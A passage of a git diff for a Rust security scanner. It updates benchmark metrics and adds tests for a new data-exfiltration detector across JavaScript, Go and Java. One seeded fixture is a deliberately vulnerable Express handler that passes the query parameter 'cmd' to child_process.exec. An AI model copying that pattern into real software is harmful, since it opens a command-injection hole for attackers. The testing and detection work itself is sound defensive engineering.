+ "tn": 16, "precision": 1.0, "recall": 1.0, "f1": 1.0 @@ -8230,31 +8595,31 @@ "f1": 1.0 }, "go": { - "tp": 25, + "tp": 26, "fp": 1, "fn_": 0, - "tn": 28, - "precision": 0.9615384615384616, + "tn": 29, + "precision": 0.9629629629629629, "recall": 1.0, - "f1": 0.9803921568627451 + "f1": 0.9811320754716981 }, "java": { - "tp": 19, - "fp": 0, - "fn_": 0, - "tn": 20, - "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "tp": 20, + "fp": 2, + "fn_": 1, + "tn": 18, + "precision": 0.9090909090909091, + "recall": 0.9523809523809523, + "f1": 0.9302325581395349 }, "javascript": { - "tp": 19, - "fp": 0, + "tp": 22, + "fp": 4, 
"fn_": 0, - "tn": 24, - "precision": 1.0, + "tn": 22, + "precision": 0.8461538461538461, "recall": 1.0, - "f1": 1.0 + "f1": 0.9166666666666666 }, "php": { "tp": 18, @@ -8266,19 +8631,19 @@ "f1": 1.0 }, "python": { - "tp": 26, + "tp": 28, "fp": 0, "fn_": 0, - "tn": 28, + "tn": 29, "precision": 1.0, "recall": 1.0, "f1": 1.0 }, "ruby": { - "tp": 19, + "tp": 20, "fp": 0, "fn_": 0, - "tn": 20, + "tn": 21, "precision": 1.0, "recall": 1.0, "f1": 1.0 @@ -8286,14 +8651,14 @@ "rust": { "tp": 34, "fp": 0, - "fn_": 0, + "fn_": 1, "tn": 39, "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "recall": 0.9714285714285714, + "f1": 0.9855072463768115 }, "typescript": { - "tp": 32, + "tp": 34, "fp": 0, "fn_": 0, "tn": 23, @@ -8357,6 +8722,15 @@ "recall": 1.0, "f1": 1.0 }, + "data_exfil": { + "tp": 13, + "fp": 0, + "fn_": 0, + "tn": 0, + "precision": 1.0, + "recall": 1.0, + "f1": 1.0 + }, "deser": { "tp": 8, "fp": 0, @@ -8422,7 +8796,7 @@ }, "safe": { "tp": 0, - "fp": 1, + "fp": 7, "fn_": 0, "tn": 231, "precision": 0.0, @@ -8457,13 +8831,13 @@ "f1": 1.0 }, "ssrf": { - "tp": 28, + "tp": 26, "fp": 0, - "fn_": 0, + "fn_": 2, "tn": 0, "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "recall": 0.9285714285714286, + "f1": 0.962962962962963 }, "xss": { "tp": 23, @@ -8477,31 +8851,31 @@ }, "by_confidence": { ">=High": { - "tp": 79, - "fp": 104, - "fn_": 146, - "tn": 128, - "precision": 0.43169398907103823, - "recall": 0.3511111111111111, - "f1": 0.3872549019607843 + "tp": 74, + "fp": 106, + "fn_": 164, + "tn": 132, + "precision": 0.4111111111111111, + "recall": 0.31092436974789917, + "f1": 0.354066985645933 }, ">=Low": { - "tp": 81, - "fp": 116, - "fn_": 144, - "tn": 116, - "precision": 0.41116751269035534, - "recall": 0.36, - "f1": 0.3838862559241706 + "tp": 76, + "fp": 133, + "fn_": 162, + "tn": 105, + "precision": 0.36363636363636365, + "recall": 0.31932773109243695, + "f1": 0.34004474272930646 }, ">=Medium": { - "tp": 81, - "fp": 116, - "fn_": 144, - "tn": 116, - "precision": 
0.41116751269035534, - "recall": 0.36, - "f1": 0.3838862559241706 + "tp": 76, + "fp": 123, + "fn_": 162, + "tn": 115, + "precision": 0.38190954773869346, + "recall": 0.31932773109243695, + "f1": 0.34782608695652173 } } } \ No newline at end of file diff --git a/tests/benchmark_test.rs b/tests/benchmark_test.rs index 5560d3a1..a0e3a6cb 100644 --- a/tests/benchmark_test.rs +++ b/tests/benchmark_test.rs @@ -697,6 +697,34 @@ fn benchmark_evaluation() { "Rule-level F1 {:.3} fell below threshold 0.920 (baseline 0.970)", rule.f1, ); + + // ── Per-class floors ──────────────────────────────────────────── + // DATA_EXFIL: 13 TP fixtures across 8 languages. Baseline at the + // 0.5.x → next-minor ship is P=1.000 R=1.000 F1=1.000 with 6 paired + // safe fixtures (sensitivity-gate, sanitizer-wrap) holding FP=0 on + // the data_exfil-class noise budget. Floor at 0.85 absorbs a one- + // case regression (~0.077 on 13 cases) while still catching a + // structural break. When you land a durable improvement, tighten + // this floor; do not relax it to paper over a regression. + if let Some(de) = results.by_vuln_class.get("data_exfil") { + assert!( + de.f1 >= 0.85, + "data_exfil rule-level F1 {:.3} fell below threshold 0.85 (baseline 1.000)", + de.f1, + ); + assert!( + de.recall >= 0.85, + "data_exfil rule-level recall {:.3} fell below threshold 0.85 (baseline 1.000)", + de.recall, + ); + assert!( + de.precision >= 0.85, + "data_exfil rule-level precision {:.3} fell below threshold 0.85 (baseline 1.000)", + de.precision, + ); + } else { + panic!("data_exfil class missing from by_vuln_class breakdown"); + } } // ── Confidence-threshold scoring ───────────────────────────────────── diff --git a/tests/calibration_data_exfil.rs b/tests/calibration_data_exfil.rs new file mode 100644 index 00000000..500f630c --- /dev/null +++ b/tests/calibration_data_exfil.rs @@ -0,0 +1,283 @@ +//! Calibration tests for `taint-data-exfiltration` severity, confidence, +//! and rank scoring. +//! +//! 
These tests pin the calibration described in `docs/detectors.md` so any +//! future change to the scoring path either preserves the documented tier +//! relationships or breaks a test deliberately. +//! +//! What is checked here: +//! +//! * Cookie source + Confirmed symbolic verdict produces High severity +//! (cookies carry session / credential material and are treated as +//! Secret-tier for the leak class). +//! * Env source + Confirmed verdict produces High severity (same +//! reasoning, env vars carry credential material). +//! * Header / FileSystem / Database / CaughtException sources downgrade +//! to Medium severity even with a Confirmed verdict — they are +//! Sensitive but not credential-grade secrets. +//! * No symbolic verdict (or `Inconclusive` / `NotAttempted`) → Low +//! confidence (the instruction's "Inconclusive" tier; the +//! `Confidence` enum has no separate Inconclusive variant so it +//! floors to Low). +//! * Opaque body (Confirmed but with empty witness) → Medium +//! confidence; the abstract domain still produced a corroboration +//! signal even if the witness string is bare. +//! * `path_validated=true` drops a confidence tier (Medium → Low). +//! * On the same source, DATA_EXFIL ranks strictly below SSRF (the +//! taint-class bonus is +7 for data-exfil vs +10 for the generic +//! `taint-unsanitised-flow`). 
+ +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::evidence::{ + Confidence, Evidence, SpanEvidence, SymbolicVerdict, Verdict, compute_confidence, +}; +use nyx_scanner::labels::SourceKind; +use nyx_scanner::patterns::{FindingCategory, Severity}; +use nyx_scanner::rank::compute_attack_rank; + +fn make_evidence(source_kind: SourceKind, verdict: Option<Verdict>) -> Evidence { + Evidence { + source: Some(SpanEvidence { + path: "src/leak.js".into(), + line: 1, + col: 1, + kind: "source".into(), + snippet: Some("req.cookies.session".into()), + }), + sink: Some(SpanEvidence { + path: "src/leak.js".into(), + line: 5, + col: 5, + kind: "sink".into(), + snippet: Some("fetch('/endpoint', { body: payload })".into()), + }), + source_kind: Some(source_kind), + hop_count: Some(1), + cap_specificity: Some(1), + symbolic: verdict.map(|v| SymbolicVerdict { + verdict: v, + constraints_checked: 0, + paths_explored: 1, + // For Confirmed cases use the strong-witness phrasing so the + // test exercises the same code path that real symex output + // takes (see `compute_taint_confidence` for the analogous + // witness-strength branch).
+ witness: matches!(v, Verdict::Confirmed) + .then(|| "tainted cookie flows to fetch body".into()), + interproc_call_chains: vec![], + cutoff_notes: vec![], + }), + ..Default::default() + } +} + +fn make_diag( + rule_id: &str, + severity: Severity, + source_kind: SourceKind, + verdict: Option<Verdict>, + path_validated: bool, +) -> Diag { + Diag { + path: "src/leak.js".into(), + line: 5, + col: 5, + severity, + id: rule_id.into(), + category: FindingCategory::Security, + path_validated, + guard_kind: if path_validated { + Some("Validation".into()) + } else { + None + }, + message: None, + labels: vec![], + confidence: None, + evidence: Some(make_evidence(source_kind, verdict)), + rank_score: None, + rank_reason: None, + suppressed: false, + suppression: None, + rollup: None, + finding_id: String::new(), + alternative_finding_ids: vec![], + } +} + +// ── Calibration fixture 1: Cookie source, Confirmed verdict ───────────── + +#[test] +fn cookie_source_with_confirmed_verdict_is_high_medium() { + // Severity: cookies are Secret-tier for DATA_EXFIL → High. + // Confidence: Confirmed verdict on a Sensitive source → Medium (the + // routing caps at Medium even with a strong witness; see + // `compute_data_exfil_confidence`). + let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Medium, + "Cookie + Confirmed → Medium (DATA_EXFIL cap), got {confidence:?}" + ); +} + +// ── Calibration fixture 2: Env source, Confirmed verdict ──────────────── + +#[test] +fn env_source_with_confirmed_verdict_is_high_medium() { + // Env vars carry credential / config material and are treated as + // Secret-tier alongside cookies.
+ let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::EnvironmentConfig, + Some(Verdict::Confirmed), + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Medium, + "Env + Confirmed → Medium, got {confidence:?}" + ); +} + +// ── Calibration fixture 3: Header source, opaque body (no verdict) ────── + +#[test] +fn header_source_without_symex_is_medium_low() { + // Header is Sensitive but not credential-grade; severity downgrades + // to Medium. No symbolic verdict → confidence Low (the "Inconclusive + // when no symex verdict" tier from the instruction). + let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::Medium, + SourceKind::Header, + None, + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Low, + "Header + no verdict → Low, got {confidence:?}" + ); +} + +// ── Calibration fixture 4: guarded path drops a tier ──────────────────── + +#[test] +fn guarded_path_drops_confidence_tier() { + // Cookie + Confirmed would normally yield Medium confidence; the + // path-validated flag drops it one step to Low. Without the guard + // the same diag must score Medium (asserted alongside to lock in + // the delta, not just the floor). 
+ let unguarded = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + let guarded = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + true, + ); + + assert_eq!(compute_confidence(&unguarded), Confidence::Medium); + assert_eq!( + compute_confidence(&guarded), + Confidence::Low, + "guarded DATA_EXFIL path must drop one confidence tier" + ); +} + +// ── Calibration fixture 5: ranking — DATA_EXFIL below SSRF on same source + +#[test] +fn data_exfil_ranks_below_ssrf_on_same_source() { + // Cookie source flowing to `fetch` could fire either DATA_EXFIL (body + // arg) or SSRF / generic taint (URL arg). On the same severity tier + // SSRF must outrank DATA_EXFIL because the analysis-kind bonus is +10 + // for `taint-unsanitised-flow` and +7 for `taint-data-exfiltration`. + let exfil = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + let ssrf = make_diag( + "taint-unsanitised-flow (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + + let exfil_score = compute_attack_rank(&exfil).score; + let ssrf_score = compute_attack_rank(&ssrf).score; + assert!( + ssrf_score > exfil_score, + "SSRF score ({ssrf_score}) must outrank DATA_EXFIL score \ + ({exfil_score}) on the same source" + ); + // The delta is exactly the analysis-kind bonus difference (+3) — pin + // it so accidental drift trips the test rather than silently moving + // both bonuses in lock-step. 
+ assert!( + (ssrf_score - exfil_score - 3.0).abs() < 0.001, + "SSRF − DATA_EXFIL should equal the analysis-kind bonus delta \ + (+3); got {} ({} − {})", + ssrf_score - exfil_score, + ssrf_score, + exfil_score, + ); +} + +// ── Calibration fixture 6: DATA_EXFIL above AST patterns ──────────────── + +#[test] +fn data_exfil_ranks_above_ast_pattern() { + // The instruction mandates DATA_EXFIL sit above informational AST + // patterns. Use a Medium DATA_EXFIL (header source) vs a Low AST + // pattern (the typical AST-only banned-API match) to lock the + // ordering in even at the weaker end of the DATA_EXFIL spectrum. + let medium_exfil = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::Medium, + SourceKind::Header, + Some(Verdict::Confirmed), + false, + ); + let mut ast_pattern = make_diag( + "js.code_exec.eval", + Severity::Low, + SourceKind::Unknown, + None, + false, + ); + // AST patterns don't carry taint evidence; clear it so the ranker + // takes the AST-only branch. + ast_pattern.evidence = None; + + let exfil_score = compute_attack_rank(&medium_exfil).score; + let ast_score = compute_attack_rank(&ast_pattern).score; + assert!( + exfil_score > ast_score, + "DATA_EXFIL ({exfil_score}) must outrank AST pattern ({ast_score})" + ); +} diff --git a/tests/cross_file_data_exfil_split_tests.rs b/tests/cross_file_data_exfil_split_tests.rs new file mode 100644 index 00000000..46281d89 --- /dev/null +++ b/tests/cross_file_data_exfil_split_tests.rs @@ -0,0 +1,48 @@ +//! Integration test for cross-file `param_to_gate_filters` propagation. +//! +//! A wrapper function whose two parameters target distinct gated-sink +//! classes on a single inner call (here, `fetch`'s SSRF gate on the URL +//! arg vs the DATA_EXFIL gate on the body arg) must keep cap attribution +//! per-position when callers reach it across a file boundary. Without +//! [`SsaFuncSummary::param_to_gate_filters`], the wrapper's summary +//! 
collapses both params into a single `SSRF | DATA_EXFIL` mask, and +//! every caller incorrectly fires both classes regardless of which +//! argument was tainted. +//! +//! The fixture pairs the wrapper with two callers, each tainting one +//! parameter and asserting only the cap class corresponding to that +//! parameter's gate fires. + +mod common; + +use common::{scan_fixture_dir, validate_expectations}; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::{Path, PathBuf}; + +fn fixture_path(name: &str) -> PathBuf { + Path::new(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join(name) +} + +#[test] +fn cross_file_data_exfil_split() { + let dir = fixture_path("cross_file_data_exfil_split"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} + +/// Python parallel of the JS cross-file split fixture. A wrapper +/// `forward(url, body)` calls `requests.post(url, json=body)` so the URL +/// flows to the SSRF gate and the body kwarg flows to the DATA_EXFIL +/// gate. Per-position cap attribution must hold across the file +/// boundary: a caller that taints only the URL fires SSRF (no +/// DATA_EXFIL), and a caller that taints only the body with a Sensitive +/// source fires DATA_EXFIL (no SSRF). +#[test] +fn cross_file_python_data_exfil() { + let dir = fixture_path("cross_file_python_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} diff --git a/tests/data_exfil_go_integration_tests.rs b/tests/data_exfil_go_integration_tests.rs new file mode 100644 index 00000000..f86352c8 --- /dev/null +++ b/tests/data_exfil_go_integration_tests.rs @@ -0,0 +1,212 @@ +//! Integration tests for the Go bindings of the `Cap::DATA_EXFIL` +//! detector class. +//! +//! Mirrors the JS `fetch_data_exfil_integration_tests` shape: a single +//! outbound HTTP callee carries an SSRF gate (URL flow) and a DATA_EXFIL +//! 
gate (body / payload flow), and per-position cap attribution must +//! keep a tainted URL from surfacing as data exfiltration and a tainted +//! body from surfacing as SSRF. Also validates the two-step +//! `http.NewRequest` → `http.DefaultClient.Do` idiom: NewRequest is +//! modeled as a body propagator (default arg → return propagation), so +//! body taint reaches the Do gate through the returned `*http.Request`. + +mod common; + +use common::{scan_fixture_dir, validate_expectations}; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::{Path, PathBuf}; + +fn go_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("go") +} + +fn diags_for(file: &str) -> Vec<Diag> { + let dir = go_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +#[test] +fn http_post_body_data_exfil_emits_data_exfil_not_ssrf() { + let diags = diags_for("data_exfil_http_post.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for cookie → http.Post body, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.Post with tainted body must NOT emit SSRF \ + (taint-unsanitised-flow), got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn http_post_form_emits_data_exfil_not_ssrf() { + let diags = diags_for("data_exfil_post_form.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + 
exfil >= 1, + "expected at least one taint-data-exfiltration finding for header → http.PostForm data, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.PostForm with tainted form data must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn new_request_do_two_step_emits_data_exfil() { + // The two-step idiom: `req, _ := http.NewRequest(_, fixedURL, body); + // http.DefaultClient.Do(req)`. NewRequest is modeled as a body + // propagator (default arg → return) so the request value carries + // body taint into the DATA_EXFIL gate at Do. SSRF must not fire + // because the URL position at NewRequest is a hardcoded string. + let diags = diags_for("data_exfil_new_request_do.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for cookie → NewRequest → Do, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + plain_taint, + 0, + "two-step NewRequest → Do with hardcoded URL must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn map_assign_data_exfil_emits_through_url_values() { + // Container-taint DATA_EXFIL: cookies populate a `url.Values` map + // across multiple keys, then the map flows into `http.PostForm`'s + // form-data channel. The Elements heap slot must round-trip the + // cap from each `form.Set(k, v)` write to the sink-side load so + // DATA_EXFIL fires on the body channel even though `form` itself is + // not directly tainted by an Assign. SSRF must NOT fire because + // the destination URL is a hardcoded literal. 
+ let diags = diags_for("data_exfil_map_assign.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for map_assign cookies → http.PostForm, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.PostForm with tainted map must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn ssrf_url_tainted_emits_ssrf_not_data_exfil() { + // Tainted query param flows into NewRequest's URL position with a + // hardcoded body; SSRF must fire on the URL flow and DATA_EXFIL + // must NOT fire (no Sensitive source reaches the body). + let diags = diags_for("ssrf_url_tainted.go"); + let ssrf = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert!( + ssrf >= 1, + "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + exfil, + 0, + "tainted-URL NewRequest → Do must NOT emit DATA_EXFIL, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn http_post_plain_user_input_does_not_emit_data_exfil() { + // Plain attacker-controlled input (`r.FormValue`) flowing into a + // fixed-URL `http.Post` body must NOT fire `Cap::DATA_EXFIL` after + // the source-sensitivity gate strips the cap for Plain sources. 
+ let diags = diags_for("data_exfil_user_input_silenced.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "plain user input echoed into a Go http.Post body must NOT emit \ + taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn cross_file_go_data_exfil_split() { + // A wrapper whose two parameters target distinct gated-sink classes + // on a single inner `http.Post` call (`url` flows to the SSRF gate at + // arg 0; `body` flows to the DATA_EXFIL gate at arg 2). Each + // caller taints exactly one parameter and must surface only the cap + // class corresponding to that parameter's gate. + let dir = Path::new(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("cross_file_go_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} diff --git a/tests/data_exfil_java_integration_tests.rs b/tests/data_exfil_java_integration_tests.rs new file mode 100644 index 00000000..799d00dd --- /dev/null +++ b/tests/data_exfil_java_integration_tests.rs @@ -0,0 +1,138 @@ +//! Integration tests for the Java bindings of the `Cap::DATA_EXFIL` +//! detector class. +//! +//! Mirrors the JS `fetch_data_exfil_integration_tests` and Go +//! `data_exfil_go_integration_tests` shapes. Each chained-API HTTP +//! client (java.net.http, Spring RestTemplate / WebClient, OkHttp, +//! Apache HttpClient) gets its own fixture: a Sensitive source flows +//! through the body-binding chain into a fixed-URL outbound call, and +//! the regression fixture proves SSRF still fires on a tainted URL +//! without leaking into DATA_EXFIL. +//! +//! Body-binding chain propagators (`BodyPublishers.ofString`, +//! `RequestBody.create`, `StringEntity` ctor, builder `.uri()` / +//! `.POST()` / `.bodyValue()`) carry taint through the chain via the +//! 
transfer engine's default arg → return smear, so no per-callee +//! propagator rules are needed; the sink at the network call sees the +//! end-of-chain request value carrying body taint. + +mod common; + +use common::scan_fixture_dir; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::PathBuf; + +fn java_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("java") +} + +fn diags_for(file: &str) -> Vec<Diag> { + let dir = java_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +fn assert_data_exfil_fires_no_ssrf(file: &str) { + let diags = diags_for(file); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "{file}: expected at least one taint-data-exfiltration finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + plain_taint, + 0, + "{file}: fixed-URL call with tainted body must NOT emit SSRF \ + (taint-unsanitised-flow), got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn jdk_http_client_chain_emits_data_exfil_not_ssrf() { + // java.net.http: cookie → BodyPublishers.ofString → builder chain → + // client.send(req). Type-qualified resolution rewrites + // client.send → HttpClient.send so the new flat DATA_EXFIL rule + // and the existing flat SSRF rule both attach; only DATA_EXFIL + // should surface because the URL is hardcoded. + assert_data_exfil_fires_no_ssrf("data_exfil_jdk_httpclient.java"); +} + +#[test] +fn rest_template_post_for_object_emits_data_exfil_not_ssrf() { + // Spring RestTemplate: header → restTemplate.postForObject(url, + // body, type). 
RestTemplate subtypes HttpClient via the + // JAVA_HIERARCHY so type-qualified resolution finds the same flat + // rule that the JDK client uses. + assert_data_exfil_fires_no_ssrf("data_exfil_resttemplate.java"); +} + +#[test] +fn web_client_body_value_emits_data_exfil_not_ssrf() { + // Spring WebClient: env var → webClient.post().uri(u).bodyValue(p) + // .retrieve(). The body-bind step `bodyValue` carries a flat + // DATA_EXFIL sink rule — a bare-name suffix matcher independent of + // receiver typing, since the chain receiver type is RequestBodySpec. + assert_data_exfil_fires_no_ssrf("data_exfil_webclient.java"); +} + +#[test] +fn ok_http_new_call_execute_emits_data_exfil_not_ssrf() { + // OkHttp two-step: session attribute → RequestBody.create → + // builder chain → client.newCall(req).execute(). Chain + // normalization strips `()` between dots so the suffix + // `newCall.execute` matches. + assert_data_exfil_fires_no_ssrf("data_exfil_okhttp.java"); +} + +#[test] +fn apache_http_client_execute_emits_data_exfil_not_ssrf() { + // Apache HttpClient: cookie → StringEntity → HttpPost.setEntity → + // httpClient.execute(req). CloseableHttpClient subtypes HttpClient + // so type-qualified resolution rewrites client.execute → + // HttpClient.execute and reuses the same flat rule. + assert_data_exfil_fires_no_ssrf("data_exfil_apache_httpclient.java"); +} + +#[test] +fn ssrf_url_only_emits_ssrf_not_data_exfil() { + // Tainted URL with hardcoded body: SSRF must fire on the URL flow, + // DATA_EXFIL must NOT fire because no Sensitive source reaches the + // body. Guards against the new flat DATA_EXFIL rule over-firing. 
+ let diags = diags_for("ssrf_url_only_no_data_exfil.java"); + let ssrf = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert!( + ssrf >= 1, + "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + assert_eq!( + exfil, + 0, + "tainted-URL HttpClient.send must NOT emit DATA_EXFIL, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} diff --git a/tests/db_corruption_tests.rs b/tests/db_corruption_tests.rs index ad085570..d9bc0e2b 100644 --- a/tests/db_corruption_tests.rs +++ b/tests/db_corruption_tests.rs @@ -38,12 +38,17 @@ fn test_cfg() -> Config { } fn seed_project(root: &Path) { + // Use the qualified `child_process.exec` form so the seed produces a + // taint finding under the post-fix label rules (bare `exec` as a flat + // sink was removed because it suffix-matched any `.exec`, e.g. + // Dockerode `container.exec`). The qualified form is the canonical + // Node.js stdlib path and stays a flat sink. std::fs::write( root.join("cmdi.js"), - b"const cp = require('child_process');\n\ + b"const child_process = require('child_process');\n\ const express = require('express');\n\ const app = express();\n\ - app.get('/x', (req, res) => { cp.exec(req.query.cmd); res.send('ok'); });\n", + app.get('/x', (req, res) => { child_process.exec(req.query.cmd); res.send('ok'); });\n", ) .unwrap(); } diff --git a/tests/fetch_data_exfil_integration_tests.rs b/tests/fetch_data_exfil_integration_tests.rs index 0a213d8a..6b89e3f3 100644 --- a/tests/fetch_data_exfil_integration_tests.rs +++ b/tests/fetch_data_exfil_integration_tests.rs @@ -5,6 +5,12 @@ //! headers / json flow), and a tainted body must not surface as SSRF and //! vice versa. Also sanity-checks the SARIF output so the new finding //! 
class produces a distinct rule id. +//! +//! `DATA_EXFIL` is gated on source sensitivity: only `Sensitive`-tier +//! sources (cookies, headers, env, db rows, file reads) trigger the cap. +//! Plain user input echoed back into a body is *not* data exfiltration — +//! the user already controls the value. See +//! `fetch_body_user_input_silenced.js` for the negative regression. mod common; @@ -79,6 +85,87 @@ fn fetch_ssrf_url_tainted_emits_ssrf_not_data_exfil() { ); } +#[test] +fn fetch_body_plain_user_input_does_not_emit_data_exfil() { + // Plain attacker-controlled input (`req.body.message`) flowing into a + // fixed-URL `fetch` body must NOT fire `Cap::DATA_EXFIL` after the + // source-sensitivity gate. The user already controls the value; + // surfacing it back to the user via the outbound payload is not a + // cross-boundary disclosure. + let diags = diags_for("fetch_body_user_input_silenced.js"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "plain user input echoed into a fetch body must NOT emit \ + taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + +#[test] +fn fetch_body_data_exfil_witness_mentions_session_token() { + // Symex-witness regression guard: a DATA_EXFIL `Confirmed` (or + // Inconclusive but witness-bearing) verdict on the cookie → fetch + // body fixture must surface the session-token payload in its + // witness string. The cap-specific payload selector in + // `src/symex/witness.rs::witness_payload` returns + // `<session-token>` for `Cap::DATA_EXFIL`; the rendered witness + // (via `get_sink_witness`) substitutes that into the + // string-renderable expression so the analyst sees that the *leak* + // is a credential-bearing payload, not an injection. + // + // When symex emits no witness for this flow (e.g. 
the expression + // tree was opaque) the test silently accepts that; the assertion + // is one-sided so the witness shape is locked but witness absence + // is not promoted to a hard failure (the calibration suite + // already covers the no-witness path). + let diags = diags_for("fetch_body_data_exfil.js"); + let exfil_witnesses: Vec<&String> = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .filter_map(|d| { + d.evidence + .as_ref() + .and_then(|e| e.symbolic.as_ref()) + .and_then(|sv| sv.witness.as_ref()) + }) + .collect(); + for w in &exfil_witnesses { + assert!( + w.contains("<session-token>") || w.contains("body") || w.contains("payload"), + "DATA_EXFIL witness must mention the leaked payload \ + (<session-token>) or body/payload context. Got: {w:?}", + ); + } +} + +#[test] +fn fetch_body_int_value_does_not_emit_data_exfil() { + // Numeric-typed bodies (e.g. `parseInt(req.cookies.session_count)`) + // are payload-incompatible: ints cannot carry session tokens, header + // secrets, or any credential material that constitutes a + // cross-boundary disclosure. `is_type_safe_for_sink` lists + // `DATA_EXFIL` in its type-suppressible cap mask so a proven-Int SSA + // value at the gate silences the finding. 
